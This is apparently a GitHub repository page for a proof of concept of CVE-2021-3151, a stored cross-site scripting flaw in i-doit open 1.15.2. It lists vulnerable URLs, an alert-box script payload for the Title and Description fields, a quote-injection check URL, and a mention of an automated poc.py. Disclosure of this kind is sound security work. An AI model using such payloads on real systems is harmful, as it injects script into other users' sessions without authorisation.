Skip to content

Latest commit

 

History

History

CVE-2021-3151

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
screen
screen
 
 
README.MD
README.MD
 
 
chromedriver.exe
chromedriver.exe
 
 
idoit-open-1.15.2.zip
idoit-open-1.15.2.zip
 
 
poc.py
poc.py
 
 

README.MD

CVE-2021-3151

On the next day: Description and usage =)

Reproduce

Vulnerable page in the Infrastructure section

  • Network
    • local ports

Vulnerable (Infrastructure) section

Parameter:

viewMode (Infrastructure, Object, Network > local ports = XSS simbol{'})

  • URL
http://192.168.1.2/?viewMode=1100&tvMode=1006&tvType=1&objID=26&catgID=41&objTypeID=19&cateID=1&editMode=1

insert the simple payload: =)

	Title:       <script>alert("nu11secur1ty_is_here");</script>
	Description: <script>alert("nu11secur1ty_is_here");</script>

Click on the save button

  • screen

Manually checking the Payload:

http://192.168.1.2/index.php?viewMode=1002&tvMode=1006&tvType=1&objID=26&catgID=41%27
  • result

Parameter:

viewMode (Infrastructure, Object, Network > local pots = XSS simbol{'})

Run the poc.py automated script to check if your Payload is working

python3 poc.py
  • result

Proof

BR